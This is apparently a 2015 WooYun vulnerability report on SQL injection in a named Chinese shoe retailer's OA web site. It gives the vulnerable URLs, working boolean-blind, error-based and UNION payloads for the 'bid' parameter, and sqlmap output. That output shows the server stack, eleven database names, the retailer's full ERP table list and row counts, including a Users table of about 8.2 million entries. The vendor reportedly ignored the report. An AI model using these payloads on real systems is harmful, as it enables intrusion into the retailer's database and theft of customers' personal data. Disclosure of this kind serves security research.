2015-07-13: 细节已通知厂商,等待厂商处理中。
2015-07-18: 厂商已主动忽略该漏洞,细节向公众公开。
1. http://oa.letao.com/wap/app_download.aspx?bid=14&op=brand
2. http://oa.letao.com//wap/shoe.aspx?add=&iid=1
---Parameter: bid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bid=14 AND 3089=3089&op=brand Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: bid=14 AND 1901=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(106)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (1901=1901) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(98)+CHAR(113)))&op=brand Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: bid=14 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(120)+CHAR(106)+CHAR(106)+CHAR(113)+CHAR(81)+CHAR(114)+CHAR(119)+CHAR(71)+CHAR(105)+CHAR(99)+CHAR(70)+CHAR(107)+CHAR(65)+CHAR(72)+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL,NULL-- &op=brand---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008current user: 'letao_user'available databases [11]:[*] ASPState[*] distribution[*] ImagesRecord[*] letao_accounting[*] Letao_Web_Log[*] letaoerp[*] master[*] model[*] msdb[*] tempdb[*] zcltestDatabase: letaoerp[262 tables]+------------------------------------+| Addressee || BRAND_TECH || Brand || CH_ACCOUNT_BALANCE || CH_BOX_ORDER_DETAIL || CH_BOX_ORDER_DETAIL || CH_LOG || CH_RETURN_ORDER_DETAIL || CH_RETURN_ORDER_DETAIL || CH_RETURN_ORDER_RECORD || CH_SELL_ORDER_ADJUST || CH_SELL_ORDER_ADJUST || CH_SELL_ORDER_DETAIL || CH_SELL_ORDER_RECORD || CH_SELL_SCHEDULE_ORDER_DETAIL || CH_SELL_SCHEDULE_ORDER_DETAIL || CH_SHIP_ORDER_DETAIL || CH_SHIP_ORDER_DETAIL || CmsContent || Dealer || ERP_ADDR_AREA || ERP_ADDR_CITY || ERP_ADDR_PROVINCE || ERP_AD_DEFINE || ERP_AD_PLAN || ERP_ARTICLE_CONTENT || ERP_ARTICLE_CONTENT || ERP_ARTICLE_TYPE || ERP_BANK_BANK_CODE || ERP_BANK_BRANCH_LIST || ERP_BANK_CITY_LIST || ERP_BAOSHENG_STOCK || ERP_CHANNEL_PROMOTION_TABLE || ERP_COUPAN_BATCH || ERP_COUPAN_CAMPAIGN || ERP_COUPAN_EXCEPTION || 
ERP_COUPAN_RECORD || ERP_COUPAN_SECTION || ERP_COUPAN_USER_ALLOCATED || ERP_COUPON_DANPINPAI_LIST || ERP_COUPON_DANPIN_LIST || ERP_CO_PAY_RECORD_ONLINE || ERP_CO_REFUND_ORDER || ERP_CO_REJECT_ORDER || ERP_CUSTOMER || ERP_DEALER_PRODUCT_LIST || ERP_DEALER_STOCK_EXCEPTION || ERP_DEALER_STOCK_LIST || ERP_DEFECT_WARE_DETAIL || ERP_DEFECT_WARE_DETAIL || ERP_EDM_BATCH_SEND || ERP_EDM_UNSUBSCRIBER || ERP_EXPRESS_CONTRACT || ERP_EXPRESS_FORM_DEFINE || ERP_GIFT_CARD_DEFINE || ERP_GIFT_CARD_RECORD || ERP_INVENTORY_DIFFERENCE || ERP_INVENTORY_DIFFERENCE || ERP_INVENTORY_DIFF_ADJUST || ERP_INVENTORY_RESULT2 || ERP_INVENTORY_RESULT2 || ERP_INVENTORY_SCAN || ERP_INVENTORY_TASK || ERP_IPHONE_MESSAGE || ERP_InvitePraise_For_TaoBao || ERP_JOB || ERP_JUSHOU_INFO || ERP_KEYWORD_TRANSFER || ERP_MARKET_LIBAO || ERP_MARKET_ORDERGIFT || ERP_MARKET_PRODUCTGIFT || ERP_MARKET_URL || ERP_MATERIAL_APPLY_DETAIL || ERP_MATERIAL_APPLY_DETAIL || ERP_MATERIAL_DEALER || ERP_MATERIAL_ORDER || ERP_MATERIAL_PURCHASE_DETAIL || ERP_MATERIAL_PURCHASE_DETAIL || ERP_MATERIAL_STAT || ERP_MATERIAL_STOCK || ERP_MATERIAL_TRANSFER_DETAIL || ERP_MATERIAL_TRANSFER_DETAIL || ERP_MIAOSHA || ERP_MILK_API_LOG || ERP_MILK_APP_CONFIG || ERP_MOBILE_CATEGORY_CMS || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_MIAOSHA_V2_DETAIL || ERP_MOBILE_SMS_BATCH_SEND || ERP_MiniSite_CSS || ERP_MiniSite_PageSource || ERP_MiniSite_Page_CSS || ERP_MiniSite_Page_Script || ERP_MiniSite_Script || ERP_NEARESST_DELIVERY || ERP_ONTHEHOUR_COUPAN || ERP_OP_ITEM_LOCK || ERP_OP_ITEM_LOG || ERP_ORDER_NOTIFY_HISTORY || ERP_ORDER_NOTIFY_HISTORY || ERP_PHONE_LOG || ERP_PHONE_NAMELOG || ERP_PO_SHIP_ORDER_DETAIL || ERP_PO_SHIP_ORDER_DETAIL || ERP_PRICE_FORMULA || ERP_PRODUCT_CATEGORY_DEFINE || ERP_PRODUCT_CHANGELOG || ERP_PRODUCT_DISCOUNT_DEFINE || ERP_PRODUCT_PRICE_MANAGER || ERP_PRODUCT_PROPERTIES || ERP_PRODUCT_PROPERTY_DEFINE || ERP_PROD_PRICE_CHANGELOG || ERP_PROMOTION_CATEGORY_LINK || ERP_PROMOTION_CATEGORY_LINK || 
ERP_PROMOTION_LIST || ERP_PROMOTION_PRICE_FORMULA || ERP_PROMOTION_PRODUCT || ERP_PURCHASE_DEFER_ORDER || ERP_PURCHASE_IMG || ERP_PURCHASE_ORDER_DETAIL || ERP_PURCHASE_ORDER_DETAIL || ERP_ProductOnlyCode || ERP_QQ_COUPAN_MAP_TABLE || ERP_QUE_TUI_HUO_RECORD || ERP_RECEIPT_ORIGINAL || ERP_RESTORE || ERP_RETURN_BY_EXPRESS_DETAIL || ERP_RETURN_BY_EXPRESS_DETAIL || ERP_RETURN_BY_EXPRESS_PROVINCE || ERP_RETURN_ORDER || ERP_RO_RESERVE_PROD_DETAIL || ERP_SALES_ORDER_DETAIL || ERP_SALES_ORDER_DETAIL || ERP_SALES_PREDICTION_BASE || ERP_SEM_KEYWORD_LIB || ERP_SEM_PROD_SKU_LIST || ERP_SEO_CHANEL_CLASS_URL || ERP_SEO_CHANEL_LEXICON || ERP_SEO_CHANEL_PAGE_CLASS || ERP_SEO_CHANEL_PAGE_KEY || ERP_SHIPPING_RECORD_DETAIL || ERP_SHIPPING_RECORD_DETAIL || ERP_SHOE_BRAND_SIZE_TABLE || ERP_SITE_MESSAGE || ERP_SITE_TEMPLATE_CMS || ERP_SO_BANKINFO || ERP_SO_BATCH || ERP_SO_DE_PRICE_DETAIL || ERP_STOCK_MAIN || ERP_STOCK_PICKUP_FORM_DETAIL || ERP_STOCK_PICKUP_FORM_DETAIL || ERP_STOCK_PROD_MOVE_DETAIL || ERP_STOCK_PROD_MOVE_DETAIL || ERP_STOCK_RETURN_DEALER_FORM || ERP_STOCK_RETURN_DEALER_RECORD || ERP_STOCK_SHELF_DEFINE || ERP_STOCK_TRANSFER || ERP_STOCK_UPC || ERP_STOCK_UPLOADSHELF_DETAIL || ERP_STOCK_UPLOADSHELF_FORM || ERP_ShippingTimeOutRule || ERP_TALLY_DIFFERENCE || ERP_TALLY_SCAN || ERP_TALLY_TASK_DETAIL || ERP_TALLY_TASK_DETAIL || ERP_TRANSFER_RULE || ERP_TUANGOU || ERP_Tie_Shoes_Method || ERP_Tie_Shoes_Step || ERP_UNION_LMWL_LIB || ERP_UNION_LMWL_LIB || ERP_UNION_NOTITY || ERP_UNION_PRE_REGISTER || ERP_UNION_STEP_RATIO || ERP_USERS || ERP_USER_ADMIN_LOG || ERP_USER_BIND_UNION_TABLE || ERP_USER_BLACKLIST || ERP_USER_COMMENT || ERP_USER_IP_RESTRICTION || ERP_USER_LOGIN_LOG || ERP_USER_WUYOU_CARD_LOG || ERP_USER_WUYOU_CARD_LOG || ERP_WAREHOUSE_PART || ERP_WAREHOUSE_PRINTER_SETTING || ERP_WEIBO_ERROR || ERP_WEIBO_KEYWORD || ERP_WEIBO_MESSAGE_LOG || ERP_WEIBO_MESSAGE_LOG || ERP_WORK_ORDER_BEFOREREFUND_DETAIL || ERP_WORK_ORDER_BEFOREREFUND_DETAIL || ERP_WORK_ORDER_CALLIN_DETAIL || 
ERP_WORK_ORDER_DETAIL || ERP_WORK_ORDER_EXPRESS || ERP_WORK_ORDER_LOG || ERP_WORK_ORDER_PHONE_LOG || ERP_WORK_ORDER_PORC_DETAIL || ERP_WORK_ORDER_RETURN_DETAIL || ERP_WORK_ORDER_STAFF_ONLINE_LOG || ERP_WORK_ORDER_TYPE_TIME_SET || ERP_WORK_ORDER_UNUSUAL_DETAIL || ERP_WORK_ORDER_UPGRADE_DETAIL || ERP_WORK_ORDER_UPGRADE_STAT_DETAIL || ERP_WorkOrder_Group_Member || ERP_WorkOrder_Group_Member || EXPRESS_COMPANY_USER || EXPRESS_DISTRIBUTE_RULE || Erp_tie_shoes_posterDes || ExpressCompany || FREE_TUAN_ORDER_DETAIL || FREE_TUAN_ORDER_FORM || INVOICE_PRINT || INVOICE_PRINT || Image || ORDER_COUPAN_RELATIONS || OrderDetail || OrderForm || OrderStatus || PRODUCT_BRAND_TECH_MAP || PROMO_SETTING || Payments || Po_Detail || ProdComment || ProductPresellDetail || ProductPresellDetail || ProductPresellDetail || Product_Style || PurChase_Order || SHIPPING_EXPENSE_RULE || SHIPPING_EXPENSE_RULE || SHIP_ORDER_DETAIL || SITE_SOURCE_BIND_TALBE || STOCK_BASE || STOCK_LOG || Shipping_Order || Storehouse || Third_Part_Logistics_Cost || Third_Part_Order_Syn || Third_Part_Sales_Prom_Detail || Third_Part_Sales_Prom_Detail || Third_Part_Sales_Prom_Log || Third_Part_Shop_Product || Transfer || UNION_PAPERS_IMG || UNION_PROMOTION || UN_Member || UN_S_Member || UN_School || USER_BLACKLIST || USER_UNION_BIND_TABLE || UnionIp || Union_Keys || UserCMS || Users || VIRTUAL_ACCOUNT_DETAIL || VIRTUAL_ACCOUNT_DETAIL || aa_neigou || erp_temp_order_commetnt || erp_temp_product || erp_temp_users || sysdiagrams |+------------------------------------+Database: letaoerp+----------------------------------------+---------+| Table | Entries |+----------------------------------------+---------+| dbo.Users | 8239897 || dbo.STOCK_BASE | 5395797 || dbo.STOCK_LOG | 4835160 || dbo.OrderForm | 4029015 || dbo.ERP_SHIPPING_RECORD_DETAIL | 3999741 || dbo.ERP_SHIPPING_RECORD_DETAIL | 3999741 || dbo.ERP_WORK_ORDER_LOG | 3592011 || dbo.Shipping_Order | 3250157 || dbo.ERP_STOCK_PICKUP_FORM_DETAIL | 3179602 || 
dbo.ERP_STOCK_PICKUP_FORM_DETAIL | 3179602 || dbo.OrderDetail | 3152279 || dbo.ERP_STOCK_PROD_MOVE_DETAIL | 3023639 || dbo.ERP_STOCK_PROD_MOVE_DETAIL | 3023639 || dbo.Addressee | 2327577 || dbo.CH_SELL_ORDER_DETAIL | 1822130 || dbo.ERP_ORDER_NOTIFY_HISTORY | 1693994 || dbo.ERP_ORDER_NOTIFY_HISTORY | 1693994 || dbo.ERP_PHONE_LOG | 1344950 || dbo.Po_Detail | 1279008 || dbo.ERP_CO_PAY_RECORD_ONLINE | 1254242 || dbo.ERP_STOCK_RETURN_DEALER_RECORD | 1038093 || dbo.ERP_QQ_COUPAN_MAP_TABLE | 965219 || dbo.ERP_SITE_MESSAGE | 948726 || dbo.ERP_COUPAN_RECORD | 916635 || dbo.ERP_PRODUCT_PROPERTIES | 858909 || dbo.ERP_COUPAN_USER_ALLOCATED | 714693 || dbo.CH_SHIP_ORDER_DETAIL | 707145 || dbo.CH_SHIP_ORDER_DETAIL | 707145 || dbo.SHIP_ORDER_DETAIL | 664185 || dbo.Image | 618299 || dbo.CH_BOX_ORDER_DETAIL | 605770 || dbo.CH_BOX_ORDER_DETAIL | 605770 || dbo.ERP_TALLY_SCAN | 586193 || dbo.ProdComment | 547894 || dbo.ERP_STOCK_UPC | 516154 || dbo.ERP_QUE_TUI_HUO_RECORD | 511366 || dbo.ERP_USER_LOGIN_LOG | 484013 || dbo.ERP_STOCK_MAIN | 466099 || dbo.ERP_STOCK_UPLOADSHELF_DETAIL | 442979 || dbo.ERP_INVENTORY_SCAN | 382799 || dbo.CH_SELL_ORDER_RECORD | 376943 || dbo.ERP_USER_COMMENT | 341964 || dbo.CH_RETURN_ORDER_DETAIL | 331885 || dbo.CH_RETURN_ORDER_DETAIL | 331885 || dbo.ERP_SEM_KEYWORD_LIB | 325055 || dbo.CH_SELL_SCHEDULE_ORDER_DETAIL | 257717 || dbo.CH_SELL_SCHEDULE_ORDER_DETAIL | 257717 || dbo.ERP_PROD_PRICE_CHANGELOG | 235138 || dbo.ERP_RETURN_ORDER | 213133 || dbo.ERP_MATERIAL_PURCHASE_DETAIL | 211566 || dbo.ERP_MATERIAL_PURCHASE_DETAIL | 211566 || dbo.UN_Member | 204152 || dbo.ERP_WORK_ORDER_PORC_DETAIL | 192531 || dbo.USER_UNION_BIND_TABLE | 179191 || dbo.ERP_CO_REFUND_ORDER | 165652 || dbo.ERP_MATERIAL_APPLY_DETAIL | 154021 || dbo.ERP_MATERIAL_APPLY_DETAIL | 154021 || dbo.ERP_OP_ITEM_LOG | 144944 || dbo.erp_temp_users | 136718 || dbo.ERP_SO_BATCH | 117908 || dbo.ERP_SALES_PREDICTION_BASE | 111691 || dbo.ERP_RO_RESERVE_PROD_DETAIL | 106470 || dbo.ERP_BANK_BRANCH_LIST | 
104040 || dbo.ERP_PROMOTION_PRODUCT | 102297 || dbo.ERP_DEALER_PRODUCT_LIST | 100814 || dbo.ERP_PRODUCT_DISCOUNT_DEFINE | 99256 || dbo.ERP_PHONE_NAMELOG | 98998 || dbo.ERP_WORK_ORDER_PHONE_LOG | 98813 || dbo.ERP_TRANSFER_RULE | 92939 || dbo.INVOICE_PRINT | 88421 || dbo.INVOICE_PRINT | 88421 || dbo.ERP_PRODUCT_CHANGELOG | 78748 || dbo.ERP_WORK_ORDER_CALLIN_DETAIL | 78374 || dbo.aa_neigou | 70863 || dbo.CH_RETURN_ORDER_RECORD | 66166 || dbo.ERP_PO_SHIP_ORDER_DETAIL | 60918 || dbo.ERP_PO_SHIP_ORDER_DETAIL | 60918 || dbo.ERP_COUPAN_EXCEPTION | 58539 || dbo.ERP_WORK_ORDER_UPGRADE_DETAIL | 56482 || dbo.ERP_MILK_API_LOG | 54401 || dbo.ERP_WEIBO_ERROR | 45348 || dbo.ERP_PROMOTION_PRICE_FORMULA | 42021 || dbo.ERP_WEIBO_MESSAGE_LOG | 41342 || dbo.ERP_WEIBO_MESSAGE_LOG | 41342 || dbo.Third_Part_Shop_Product | 36895 || dbo.ERP_SALES_ORDER_DETAIL | 35119 || dbo.ERP_SALES_ORDER_DETAIL | 35119 || dbo.ERP_PRODUCT_PRICE_MANAGER | 34158 || dbo.ERP_BAOSHENG_STOCK | 32675 || dbo.ERP_SO_BANKINFO | 30541 || dbo.ERP_WORK_ORDER_RETURN_DETAIL | 29362 || dbo.PurChase_Order | 28715 || dbo.ERP_TALLY_DIFFERENCE | 25595 || dbo.ERP_CO_REJECT_ORDER | 25304 || dbo.ERP_EDM_UNSUBSCRIBER | 22657 || dbo.ERP_WORK_ORDER_UNUSUAL_DETAIL | 21936 || dbo.ERP_WORK_ORDER_DETAIL | 21171 || dbo.ERP_RECEIPT_ORIGINAL | 18023 || dbo.ERP_STOCK_UPLOADSHELF_FORM | 17912 || dbo.ERP_PURCHASE_ORDER_DETAIL | 16832 || dbo.ERP_PURCHASE_ORDER_DETAIL | 16832 || dbo.ERP_INVENTORY_DIFFERENCE | 15604 || dbo.ERP_INVENTORY_DIFFERENCE | 15604 || dbo.ERP_DEALER_STOCK_LIST | 15507 || dbo.CH_SELL_ORDER_ADJUST | 14740 || dbo.CH_SELL_ORDER_ADJUST | 14740 || dbo.FREE_TUAN_ORDER_DETAIL | 14597 || dbo.ERP_JUSHOU_INFO | 14307 || dbo.ERP_WORK_ORDER_UPGRADE_STAT_DETAIL | 14305 || dbo.Product_Style | 13451 || dbo.ERP_SEO_CHANEL_PAGE_KEY | 13430 || dbo.FREE_TUAN_ORDER_FORM | 12964 || dbo.ERP_ARTICLE_CONTENT | 12434 || dbo.ERP_ARTICLE_CONTENT | 12434 || dbo.ERP_SEM_PROD_SKU_LIST | 11887 || dbo.ERP_ProductOnlyCode | 11060 |。。。。。。
数据量太大。赶紧修复吧!
危害等级:无影响(厂商忽略)
忽略时间:2015-07-18 21:08
漏洞Rank:15 (WooYun评价)
暂无